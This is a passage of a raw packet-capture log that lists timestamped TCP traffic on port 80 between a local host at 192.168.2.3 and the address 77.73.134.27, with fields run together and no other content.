                                                                                    Feb 7, 2023 19:44:56.842942953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.842947960 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842968941 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842989922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.842989922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843010902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843033075 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843038082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843060017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843077898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843079090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843094110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843106031 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843118906 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843139887 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843159914 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843163013 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843180895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843200922 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843221903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843241930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843242884 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843256950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843262911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843274117 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843285084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843307018 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843312025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843328953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843348980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843353987 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843369007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843389988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843400955 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843410015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843430042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843430996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843453884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843467951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843475103 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843496084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843498945 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843518019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843538046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843542099 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843559980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843580008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843584061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843600988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843605995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843621016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843641996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843643904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843662024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843677998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843683958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843703985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843713999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843725920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843745947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843755007 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843766928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843776941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843789101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843810081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843812943 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843831062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843852043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843852997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843872070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843874931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843897104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843904018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843918085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843924999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843940020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843945980 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843961954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843974113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.843983889 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.843995094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844006062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844017029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844026089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844042063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844048023 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844069004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844079018 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844089985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844110012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844119072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844131947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844151974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844160080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844173908 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844181061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844197035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844218016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844218016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844238997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844252110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844259977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844280958 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844289064 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844301939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844321966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844324112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844342947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844347000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844363928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844383001 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844383955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844405890 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844417095 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844425917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844446898 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844450951 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844466925 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844486952 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844495058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844510078 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844512939 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844531059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844548941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844552994 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844562054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844577074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844597101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844603062 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844618082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844624996 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844640017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844660997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844660997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844681978 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844693899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844702005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844723940 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844733000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844744921 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844764948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844770908 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844785929 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844794035 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844808102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844829082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844830036 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844849110 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844861984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844870090 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844891071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844901085 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844912052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844932079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844944954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844953060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844964981 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.844973087 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.844994068 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845001936 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845015049 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845036030 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845041990 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845057964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845062017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845078945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845098972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845103025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845119953 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845140934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845140934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845160961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845164061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845181942 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845199108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845202923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845225096 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845231056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845244884 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845266104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845271111 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845285892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845305920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845309973 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845328093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845331907 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845349073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845369101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845370054 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845390081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845401049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845411062 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845431089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845438957 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845453024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845474005 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845475912 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845494032 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845499992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845515013 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845535040 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845535040 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845557928 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845567942 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845580101 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845601082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845606089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845643044 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845643997 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845649004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845670938 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845674992 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845691919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845706940 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845714092 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845721960 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845736027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845747948 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845757008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845769882 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845777988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845798969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845804930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845819950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845839977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845839977 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845863104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845863104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845884085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845895052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845905066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845916033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845927000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845943928 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845949888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845972061 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.845974922 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.845993042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846010923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846013069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846035957 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846043110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846057892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846076012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846080065 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846101046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846106052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846122026 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846143007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846144915 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846163988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846174002 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846184969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846205950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846208096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846226931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846244097 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846250057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846271992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846275091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846292019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846312046 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846312046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846333027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846344948 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846354008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846374989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846381903 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846396923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846416950 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846420050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846438885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846441984 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846461058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846481085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846487999 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846503019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846524000 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846528053 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846544027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846550941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846565008 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846585989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846589088 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846606016 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846622944 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846631050 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846647024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846652985 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846674919 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846683025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846718073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846725941 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846734047 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846759081 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846772909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846781015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846801996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846805096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846822977 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846832991 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846844912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846864939 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846872091 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846887112 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846909046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846910954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846930981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846939087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846951962 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846971989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.846981049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.846993923 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847014904 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847018003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847034931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847040892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847057104 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847076893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847085953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847096920 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847117901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847124100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847140074 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847150087 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847161055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847181082 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847188950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847202063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847223043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847228050 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:56.847244024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:56.847254992 CET4969880192.168.2.377.73.134.27
